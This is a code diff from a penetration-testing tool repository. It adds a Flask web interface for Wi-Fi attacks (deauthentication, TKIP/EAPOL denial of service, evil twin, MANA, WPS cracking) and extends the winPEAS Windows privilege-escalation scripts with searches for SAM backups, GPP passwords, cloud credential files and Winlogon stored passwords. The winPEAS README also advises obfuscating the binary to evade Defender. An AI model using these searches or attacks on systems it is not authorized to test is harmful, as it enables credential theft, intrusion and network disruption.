case "TKIP_DoS":
show_bssid()
show_stealth()
hide_essid()
hide_channel()
hide_client()
hide_fake_essids()
break;
case "evil_twin":
hide_known_beacons()
hide_mac_whitelist()
hide_mac_blacklist()
hide_essid_whitelist()
hide_essid_blacklist()
hide_loud()
show_essid()
show_bssid()
show_channel()
break;
case "mana":
show_known_beacons()
show_mac_whitelist()
show_mac_blacklist()
show_essid_whitelist()
show_essid_blacklist()
show_loud()
hide_essid()
hide_bssid()
break;
default:
show_essid()
show_bssid()
show_client()
show_fake_essids()
show_stealth()
show_channel()
show_known_beacons()
show_mac_whitelist()
show_mac_blacklist()
show_essid_whitelist()
show_essid_blacklist()
show_loud()
break;
}
}
function hide_essid(){
$("#essid1").hide()
$("label[for='essid1']").hide()
$("#essid2").hide()
$("label[for='essid2']").hide()
}
function show_essid(){
$("#essid1").show()
$("label[for='essid1']").show()
$("#essid2").show()
$("label[for='essid2']").show()
}
function hide_bssid(){
$("#bssid").hide()
$("label[for='bssid']").hide()
$("#bssid1").hide()
$("label[for='bssid1']").hide()
$("#bssid2").hide()
$("label[for='bssid2']").hide()
}
function show_bssid(){
$("#bssid1").show()
$("label[for='bssid1']").show()
$("#bssid2").show()
$("label[for='bssid2']").show()
$("#bssid").show()
$("label[for='bssid']").show()
}
function hide_client(){
$("#client1").hide()
$("label[for='client1']").hide()
$("#client2").hide()
$("label[for='client2']").hide()
}
function show_client(){
$("#client1").show()
$("label[for='client1']").show()
$("#client2").show()
$("label[for='client2']").show()
}
function hide_channel(){
$("#channel").hide()
$("label[for='channel']").hide()
}
function show_channel(){
$("#channel").show()
$("label[for='channel']").show()
}
function show_fake_essids(){
$("#fake_essids").show()
$("label[for='fake_essids']").show()
}
function hide_fake_essids(){
$("#fake_essids").hide()
$("label[for='fake_essids']").hide()
}
function show_stealth(){
$("#stealth").show()
}
function hide_stealth(){
$("#stealth").hide()
}
function show_loud(){
$("#loud").show()
}
function hide_loud(){
$("#loud").hide()
}
function hide_known_beacons(){
$("#known_beacons").hide()
$("label[for='known_beacons']").hide()
}
function show_known_beacons(){
$("#known_beacons").show()
$("label[for='known_beacons']").show()
}
function hide_mac_whitelist(){
$("#mac_whitelist").hide()
$("label[for='mac_whitelist']").hide()
}
function show_mac_whitelist(){
$("#mac_whitelist").show()
$("label[for='mac_whitelist']").show()
}
function hide_mac_blacklist(){
$("#mac_blacklist").hide()
$("label[for='mac_blacklist']").hide()
}
function show_mac_blacklist(){
$("#mac_blacklist").show()
$("label[for='mac_blacklist']").show()
}
function hide_essid_whitelist(){
$("#essid_whitelist").hide()
$("label[for='essid_whitelist']").hide()
}
function show_essid_whitelist(){
$("#essid_whitelist").show()
$("label[for='essid_whitelist']").show()
}
function hide_essid_blacklist(){
$("#essid_blacklist").hide()
$("label[for='essid_blacklist']").hide()
}
function show_essid_blacklist(){
$("#essid_blacklist").show()
$("label[for='essid_blacklist']").show()
}
var options_msgs = {
"deauth_aireplay": "Deauthenticate a single client (sending a packet specifically for the client), clients inside an AP or clients of a ESSID (sending broadcast deuthentication packets). More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#deauthentication-packets'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#deauthentication-packets </a>",
"deauth_mdk4": "Deauthenticate a single client, clients inside an AP or clients of a ESSID by discovering clients connected and sending deauthentication/disassociation packets to them. Stealth mode make match all Sequence Numbersand not send broadcast deauthentication packets. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#disassociation-packets'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#disassociation-packets </a>",
"WIDS_confusion": "Confuse/Abuse Intrusion Detection and Prevention Systems by cross-connecting clients to multiple WDS nodes or fake rogue APs. If no stealth then it launch Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts). More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"fake_aps": "Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers. If no stealth, then it uses also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"reinject_data": "Sends authentication frames to all APs found in range. Too many clients can freeze or reset several APs. If stealth, then this test connects clients to the AP and reinjects sniffed data to keep them alive. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"EAPOL_DoS": "Floods an AP with EAPOL Start frames to keep it busy with fake sessions and thus disables it to handle any legitimate clients. Or logs off clients by injecting fake EAPOL Logoff messages. If stealth, use Logoff messages to kick clients. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"TKIP_DoS": "Sends random packets or re-injects duplicates on another QoS queue to provoke Michael Countermeasures on TKIP APs. AP will then shutdown for a whole minute, making this an effective DoS. If stealth, Use the new QoS exploit which only needs to reinject a few packets instead of the random packet injection, which is unreliable but works without QoS. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#more-dos-attacks-by-mdk4 </a>",
"evil_twin": "Create a fake access point. You decide the authentication method, the name and the BSSID. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#evil-twin'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#evil-twin </a>",
"mana": "Find the PNL of the devices and create fake APs with that ESSIDS. Select the authentication method. More info in <a href='https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#karma-mana-loud-mana-and-known-beacons-attack'> https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks#karma-mana-loud-mana-and-known-beacons-attack </a>",
"airodump": "Capture handshakes in the indicated channel using airodump-ng.",
"nullpin": "Some really bad implementations allowed the Null PIN to connect (very weird also). Reaver can test this (Bully cannot).",
"pixiedust": "Try to find if the randomization is weak"
}
window.onload = hide_fields

2
projects/wwjuggler/app/static/jquery.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

50
projects/wwjuggler/app/templates/base.html Normal file
View File

@ -0,0 +1,50 @@
{% extends 'bootstrap/base.html' %}
{% block title %}
{% if title %}{{ title }} - WWJuggler{% else %}Welcome to WWJuggler{% endif %}
{% endblock %}
{% block styles %}
<link rel="stylesheet" href="{{url_for('static', filename='bootstrap.min.css')}}">
{% endblock %}
{% block navbar %}
<script type=text/javascript src="{{ url_for('static', filename='jquery.js') }}"></script>
<nav class="navbar navbar-default">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="{{ url_for('index') }}">WWJuggler</a>
</div>
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<li><a href="{{ url_for('console') }}">Console</a></li>
<li><a href="{{ url_for('dos') }}">DoS</a></li>
<li><a href="{{ url_for('client') }}">Twin/MANA</a></li>
<li><a href="{{ url_for('create_cert') }}">EAP Cert</a></li>
<li><a href="{{ url_for('wps_cracking') }}">WPS</a></li>
<li><a href="{{ url_for('capture_handshake') }}">Cap-HShakes</a></li>
<li><a href="{{ url_for('execute') }}">Exec</a></li>
</div>
</div>
</nav>
{% endblock %}
{% block content %}
<div class="container">
{% with messages = get_flashed_messages() %}
{% if messages %}
{% for message in messages %}
<div class="alert alert-info" role="alert">{{ message }}</div>
{% endfor %}
{% endif %}
{% endwith %}
{# application content needs to be provided in the app_content block #}
{% block app_content %}{% endblock %}
</div>
{% endblock %}

17
projects/wwjuggler/app/templates/console.html Normal file
View File

@ -0,0 +1,17 @@
{% extends "base.html" %}
{% block app_content %}
{% if not procs %}
<h2> Nothing is being executed yet.</h2>
{% else %}
<h2>Current Processes <a href="/killall" style="color:red;">[Kill All]</a></h2>
{% for p in procs %}
<pre style="border: 1px solid; margin: 10px; padding-left:3px; {% if p.terminated == 'Stopped' %} color:green; {% endif %}" >
<h4>{{p.name}} {% if p.terminated == 'Running' %} <a href="/kill/{{p.name}}" style="color:red;">[Kill]</a> {% endif %} ({{p.terminated}})</h4>
{{p.tail}}
</pre>
{% endfor %}
<script>setTimeout(function(){window.location.reload(1);}, 5000);</script>
{% endif %}
{% endblock %}

19
projects/wwjuggler/app/templates/form.html Normal file
View File

@ -0,0 +1,19 @@
{% extends "base.html" %}
{% import 'bootstrap/wtf.html' as wtf %}
{% block app_content %}
<h1>{{ formtype }}</h1>
<div class="alert alert-secondary" role="alert"><h4>Information about the attack</h4><p id="option_msg"></p></div>
<p><i>Notice that ESSID2, BSSID2 and Client2 have priority over ESSID1, BSSID1 and Client1</i></p>
<div class="row">
<div class="col-md-4">
{{ wtf.quick_form(form) }}
</div>
</div>
<br>
{% endblock %}
{% block scripts %}
<script type=text/javascript src="{{ url_for('static', filename='form.js') }}"></script>
{% endblock %}

26
projects/wwjuggler/app/templates/index.html Normal file
View File

@ -0,0 +1,26 @@
{% extends "base.html" %}
{% block app_content %}
<div style="margin:20px">
<h3> Available wlan interfaces</h3>
<ul>
{% for wlan, mode in wlans.items() %}
{% if mode == "Managed" %}
<li><h5 style="color:green; font-size:15px">{{ wlan }} ({{ mode }}) <button onclick="window.location.href = '/change_wlan_mode/{{ wlan }}';">Change Mode</button> </h5></li>
{% else %}
<li><h5 style="color:red; font-size:15px">{{ wlan }} ({{ mode }}) <button onclick="window.location.href = '/change_wlan_mode/{{ wlan }}';">Change Mode</button></h5></li>
{% endif %}
{% endfor %}
</ul>
<br>
<form action="/restart_airodump">
<input type="submit" value="Restart airodump" />
</form>
<!--<br>
<form action="/reboot" method="POST" onsubmit="return confirm('Do you really want to reboot the system?');">
<input type="submit"style="color:red;" value="Reboot System" />
</form>
<br>-->
</div>
<iframe src="/scan_results" style="position:fixed; left:0px; right:0px; width:100%; height:75%; border:none; margin:0;"></iframe>
{% endblock %}

41
projects/wwjuggler/app/templates/scan_results.html Normal file
View File

@ -0,0 +1,41 @@
{% block content %}
{% if aps|length > 0 %}
<h2>Current APs</h2>
<table>
<tr>
{% for key, value in aps[0].items() %}
<th>{{key}}</th>
{% endfor %}
</tr>
{% for ap in aps %}
<tr>
{% for key, value in ap.items() %}
<th>{{value}}</th>
{% endfor %}
</tr>
{% endfor %}
</table>
<h2>Current Clients</h2>
<table>
<tr>
{% for key, value in clients[0].items() %}
<th>{{key}}</th>
{% endfor %}
</tr>
{% for client in clients %}
<tr>
{% for key, value in client.items() %}
<th>{{value}}</th>
{% endfor %}
</tr>
{% endfor %}
</table>
{% else %}
<h1>Nothing was found (is airodump-ng running?)</h1>
{% endif %}
{% endblock %}
<script>setTimeout(function(){window.location.reload(1);}, 20000);</script>

177
projects/wwjuggler/app/utils.py Normal file
View File

@ -0,0 +1,177 @@
from subprocess import Popen, PIPE
from time import sleep
import os, signal, glob, datetime
count_ps = 0
executing_procs = {}
wlans_being_used = []
main_iface = ""
current_path = os.path.dirname(os.path.abspath(__file__))
scripts_path = current_path + "/scripts/"
executing_path = current_path + "/executing/"
store_path = os.path.expanduser("~/.wwjuggler/")
current_store_path = store_path + datetime.datetime.now().strftime("%d-%m-%Y_%H:%M")
store_airodump = current_store_path + "/airodump_scan"
#############################
### Wlan ifaces functions ###
#############################
def get_wlan_interfaces():
global main_iface
wlans = {}
up_wlans_interfaces()
procs = get_procs()
for w in os.popen('ip link show | grep -oP "wlan[\da-zA-Z]*"').read().split():
wlans[w] = "Managed" if "Managed" in os.popen("iwconfig "+w+" | grep Mode").read() else "Monitor"
if w == main_iface:
wlans[w] = wlans[w] + "- Main in use"
continue
being_used = True if any( [ p["terminated"] == "Running" for p in procs if (w != main_iface and w in p["name"]) ] ) else False # True is a process using the interface is running
if being_used:
wlans[w] = wlans[w] + "- in use"
return wlans
def up_wlans_interfaces():
for iface in os.popen('ip link show | grep "DOWN" | grep -oP "wlan[\da-zA-Z]*"').read().split():
os.system("ifconfig "+iface+" up")
for iface in os.popen('ip link show | grep "DOWN" | grep -oP "wlan[\da-zA-Z]*"').read().split():
os.system("nmcli device set "+iface+" managed yes")
os.system("ifconfig "+iface+" up")
#############################
###### Clean functions ######
#############################
#def clean_exec_procs_dir():
# fileList = glob.glob(executing_path+'/*.out')
# fileList += glob.glob(executing_path+'/*.err')
# for filePath in fileList:
# try:
# os.remove(filePath)
# except:
# print("Error while deleting file : ", filePath)
def clean_data(data):
not_interesting = ["First time seen", "Last time seen", "Speed", "LAN IP", "ID-length"]
for ni in not_interesting:
data.pop(ni, None)
return data
#############################
## Wifi scanning functions ##
#############################
def get_scan_results():
if not os.path.isfile(store_airodump+'/wwjuggler-airo-01.csv'):
return ([],[])
with open(store_airodump+'/wwjuggler-airo-01.csv','r') as f:
csv_content = f.read().splitlines()
stations = []
stations_header = [val.lstrip() for val in csv_content[1].strip().split(",")]
clients = []
clients_header = []
actual = stations
actual_header = stations_header
is_client = False
for line in csv_content[2:]:
line = line.strip()
if ("Probed ESSIDs") in line:
actual = clients
clients_header = [val.lstrip() for val in line.split(",")]
actual_header = clients_header
is_client = True
continue
actual.append({})
if not is_client:
line_splitted = line.split(",")
else:
line_splitted = line.split(",")[:6]+[",".join(line.split(",")[6:])]
for i, value in enumerate(line_splitted):
actual[-1][actual_header[i]] = value.replace(" ","").lstrip()
actual[-1] = clean_data(actual[-1])
return (stations, clients)
def get_macs_aps_clients():
stations,clients = get_scan_results()
stations_macs = list(set([ b["BSSID"] for b in stations if b["BSSID"]]))
stations_macs.sort()
essids = list(set([ b["ESSID"] for b in stations if "ESSID" in b.keys() and b["ESSID"]]))
essids.sort()
clients_macs = list(set([ c["Station MAC"] for c in clients if c["Station MAC"]]))
clients_macs.sort()
stations_macs.insert(0,"")
essids.insert(0,"")
clients_macs.insert(0,"")
return stations_macs, essids, clients_macs
def restart_airo():
global main_iface
#Stop airodump
for pid in os.popen("pgrep -f '/wwjuggler-airo'").read().splitlines():
print("Kill airodump pid "+str(pid))
os.kill(int(pid), signal.SIGTERM)
#Delete previous airodumps
fileList = glob.glob(store_airodump+'/wwjuggler-airo*')
for filePath in fileList:
try:
os.remove(filePath)
except:
print("Error while deleting file : ", filePath)
#Start airodump
wlans = get_wlan_interfaces()
if len(wlans) > 0:
iface = list(wlans.keys())[0]
main_iface = iface
cmd = "airodump-ng --wps -w "+store_airodump+"/wwjuggler-airo --output-format csv --background 1 " + main_iface
print("Executing airodump: "+cmd)
Popen(cmd.split(" "))
sleep(5)
else:
print("NO WLAN INTERFACE DETECTED!!!")
#############################
#Process management functions
#############################
def get_procs():
global executing_procs
files_executing = list(filter(os.path.isfile, glob.glob(current_store_path + "/*")))
files_executing.sort(key=lambda x: os.path.getmtime(x))
files_executing.reverse()
procs = []
for f in files_executing:
f_err = f.replace(".out",".err")
if ".out" in f:
if int(os.path.getsize(f)) >= int(os.path.getsize(f_err)):
procs.append({"name": f.split("/")[-1], "terminated": "Stopped" if not (executing_procs[f.split("/")[-1]].poll() is None) else "Running", "tail": os.popen('tail -n 20 ' + f).read()})
else:
procs.append({"name": f_err.split("/")[-1], "terminated": "Stopped" if not (executing_procs[f.split("/")[-1]].poll() is None) else "Running", "tail": os.popen('tail -n 20 ' + f_err).read()})
return procs
#############################
###### Other functions ######
#############################
def my_execute(cmd, outfile, errfile, shell=False):
global executing_procs, count_ps
print("Executing: "+str(cmd))
with open(outfile, "wb") as out, open(errfile, "wb") as err:
proc = Popen(cmd, stdout=out, stderr=err, stdin=PIPE, shell=shell, preexec_fn=os.setsid)
executing_procs[outfile.split("/")[-1]] = proc
count_ps += 1

11
winPEAS/winPEASbat/README.md
View File

@ -29,6 +29,10 @@ Some of the tests in this script were extracted from **[here](https://github.com
- [x] Audit Settings
- [x] WEF Settings
- [x] LAPS installed?
- [x] LSA protection?
- [x] Credential Guard?
- [x] WDigest?
- [x] Number of cached cred
- [x] UAC Settings
- [x] AV?
- [x] PS Settings
@ -50,7 +54,12 @@ Some of the tests in this script were extracted from **[here](https://github.com
- [x] Windows Vault
- [x] DPAPI Master Keys
- [x] AppCmd.exe?
- [x] Search for known registry to have passwords and keys inside
- [x] Check for unattended files
- [x] Check for SAM & SYSTEM backups
- [x] Check for cached GPP Passwords
- [x] Check for McAffe SiteList.xml files
- [x] Check for Cloud credentials
- [x] Search for known registry to have passwords and keys inside (Winlogon...)
- [x] Search for known files to have passwords inside (can take some minutes)
- [x] If *long*, search files with passwords inside
- [x] If *long*, search registry with passwords inside

73
winPEAS/winPEASbat/winPEAS.bat
View File

@ -116,6 +116,26 @@ echo [i] Check what is being logged
REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] LSA protection? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] Active if "1"
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Credential Guard? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] Active if "1" or "2"
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WDigest? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] Plain-text creds in memory if "1"
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Number of cached creds ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] You need System to extract them
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] UAC Settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
@ -153,7 +173,8 @@ echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] INSTALLED SOFTWARE ^<_-_-_-_-_-_-_-_-_
echo [i] Some weird software? Check for vulnerabilities in unknow software installed
echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
dir /b "C:\Program Files" "C:\Program Files (x86)" | sort
reg query HKEY_LOCAL_MACHINE\SOFTWARE
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\"
reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\"
IF exist C:\Windows\CCM\SCClient.exe echo SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading)
echo.
echo.
@ -370,6 +391,54 @@ echo Looking inside %localappdata%\Microsoft\Credentials\
dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Unattended files ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO %WINDIR%\sysprep\sysprep.xml exists.
IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO %WINDIR%\sysprep\sysprep.inf exists.
IF EXIST %WINDIR%\sysprep.inf ECHO %WINDIR%\sysprep.inf exists.
IF EXIST %WINDIR%\Panther\Unattended.xml ECHO %WINDIR%\Panther\Unattended.xml exists.
IF EXIST %WINDIR%\Panther\Unattend.xml ECHO %WINDIR%\Panther\Unattend.xml exists.
IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO %WINDIR%\Panther\Unattend\Unattend.xml exists.
IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO %WINDIR%\Panther\Unattend\Unattended.xml exists.
IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO %WINDIR%\System32\Sysprep\unattend.xml exists.
IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO %WINDIR%\System32\Sysprep\unattended.xml exists.
IF EXIST %WINDIR%\..\unattend.txt ECHO %WINDIR%\..\unattend.txt exists.
IF EXIST %WINDIR%\..\unattend.inf ECHO %WINDIR%\..\unattend.inf exists.
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SAM & SYSTEM backups ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
IF EXIST %WINDIR%\repair\SAM ECHO %WINDIR%\repair\SAM exists.
IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO %WINDIR%\System32\config\RegBack\SAM exists.
IF EXIST %WINDIR%\System32\config\SAM ECHO %WINDIR%\System32\config\SAM exists.
IF EXIST %WINDIR%\repair\SYSTEM ECHO %WINDIR%\repair\SYSTEM exists.
IF EXIST %WINDIR%\System32\config\SYSTEM ECHO %WINDIR%\System32\config\SYSTEM exists.
IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO %WINDIR%\System32\config\RegBack\SYSTEM exists.
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] McAffe SiteList.xml ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
cd %ProgramFiles% 2>nul
dir /s SiteList.xml
cd %ProgramFiles(x86)% 2>nul
dir /s SiteList.xml
cd "%windir%\..\Documents and Settings" 2>nul
dir /s SiteList.xml
cd %windir%\..\Users 2>nul
dir /s SiteList.xml
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] GPP Password ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
cd "%SystemDrive%\Microsoft\Group Policy\history"
dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml
cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history"
dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Cloud Creds ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
cd "%SystemDrive%\Users"
dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json
cd "%windir%\..\Documents and Settings"
dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] AppCmd ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO %systemroot%\system32\inetsrv\appcmd.exe exists.
@ -383,7 +452,7 @@ reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
echo Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul
echo Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
reg query HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon 2>nul
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
echo Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul
echo Looking inside HKCU\Software\TightVNC\Server

19
winPEAS/winPEASexe/README.md
View File

@ -12,10 +12,9 @@ Check also the **Local Windows Privilege Escalation checklist** from **[book.hac
Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation).
```bash
winpeas.exe cmd searchfast #cmd commands and avoid sleepig (noisy - CTFs)
winpeas.exe cmd searchall searchfast #cmd commands, search all filenames and avoid sleepig (noisy - CTFs)
winpeas.exe #Will execute all checks except the ones that use a CMD
winpeas.exe cmd #All checks
winpeas.exe cmd fast #All except the one that search for files
winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed
winpeas.exe notcolor #Do not color the output
```
@ -24,11 +23,11 @@ winpeas.exe notcolor #Do not color the output
The goal of this project is to search for possible **Privilege Escalation Paths** in Windows environments.
It should take only a **few seconds** to execute almost all the checks and **some minutes during the last check searching in the whole main drive** for known files that could contain passwords (the time depened on the number of files in your drive). Get rid of that time consuming check using the parameter `fast`.
It should take only a **few seconds** to execute almost all the checks and **some seconds/minutes during the lasts checks searching for known filenames** that could contain passwords (the time depened on the number of files in your home folder). By default only **some** filenames that could contain credentials are searched, you can use the **searchall** parameter to search all the list (this could will add some minutes).
By default, the progam **sleeps 150ms** before start searching files in each directory. This is made to consume less resources (**stealthier**). You can **avoid this sleep using `searchfast` parameter**.
By default, the progam **sleeps 100ms** before start searching files in each directory. This is made to consume less resources (**stealthier**). You can **avoid this sleep using `searchfast` parameter**.
The **ouput will be colored** using **ansi** colors. If you are executing `winpeas.exe` **from a Windows console**, you need to set a registry value to see the colors:
The **ouput will be colored** using **ansi** colors. If you are executing `winpeas.exe` **from a Windows console**, you need to set a registry value to see the colors (and open a new CMD):
```
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
```
@ -52,7 +51,7 @@ Once you have installed and activated it you need to:
4. Click on **Build**
5. The **single, minimized and obfuscated binary** will appear in a **folder called Dotfuscator inside the folder were winPEAS.exe** and the DLL were (this location will be saved by dotfuscator and by default all the following builds will appear in this folder).
**I'm sorry that all of this is necessary but is worth it. Dotfuscator will merge the DLL and EXE in a single executable, will minimize the size of the executable (winpeas size was reduced to the half) and will obfuscate the code** (F\*\*k you Defender).
**I'm sorry that all of this is necessary but is worth it. Dotfuscator minimizes the size of the executable and obfuscates the code** (F\*\*k you Defender).
![](https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASexe/images/dotfuscator.PNG)
@ -73,6 +72,10 @@ Once you have installed and activated it you need to:
- [x] Basic System info information
- [x] Use Watson to search for vulnerabilities
- [x] PS, Audit, WEF and LAPS Settings
- [x] LSA protection?
- [x] Credential Guard?
- [x] WDigest?
- [x] Number of cached cred
- [x] Environment Variables
- [x] Internet Settings
- [x] Current drives information
@ -141,6 +144,10 @@ Once you have installed and activated it you need to:
- [x] Putty SSH host keys
- [x] SSH Keys inside registry
- [x] Cloud credentials
- [x] Check for unattended files
- [x] Check for SAM & SYSTEM backups
- [x] Check for cached GPP Passwords
- [x] Check for McAffe SiteList.xml files
- [x] Possible registries with credentials
- [x] Possible credentials files in users homes
- [x] Possible password files inside the Recycle bin

BIN
winPEAS/winPEASexe/images/help.png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 101 KiB

After

Width:  |  Height:  |  Size: 94 KiB

81
winPEAS/winPEASexe/winPEAS/ApplicationInfo.cs
View File

@ -49,9 +49,9 @@ namespace winPEAS
return retList;
}
public static Dictionary<string, Dictionary<string, string>> GetInstalledAppsPermsPath(string fpath)
public static SortedDictionary<string, Dictionary<string, string>> GetInstalledAppsPermsPath(string fpath)
{
Dictionary<string, Dictionary<string, string>> results = new Dictionary<string, Dictionary<string, string>>();
SortedDictionary<string, Dictionary<string, string>> results = new SortedDictionary<string, Dictionary<string, string>>();
try
{
foreach (string f in Directory.GetFiles(fpath))
@ -62,7 +62,7 @@ namespace winPEAS
}
foreach (string d in Directory.GetDirectories(fpath))
{
results[d] = MyUtils.GecRecursivePrivs(d);
results[d] = MyUtils.GetRecursivePrivs(d);
}
}
catch (Exception ex)
@ -72,12 +72,77 @@ namespace winPEAS
return results;
}
public static Dictionary<string, Dictionary<string, string>> GetInstalledAppsPerms()
public static SortedDictionary<string, Dictionary<string, string>> GetInstalledAppsPerms()
{
Dictionary<string, Dictionary<string, string>> results1 = GetInstalledAppsPermsPath(@Path.GetPathRoot(Environment.SystemDirectory) + "Program Files");
Dictionary<string, Dictionary<string, string>> results2 = GetInstalledAppsPermsPath(@Path.GetPathRoot(Environment.SystemDirectory) + "Program Files (x86)");
results1.Concat(results2).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
return results1;
//Get from Program Files
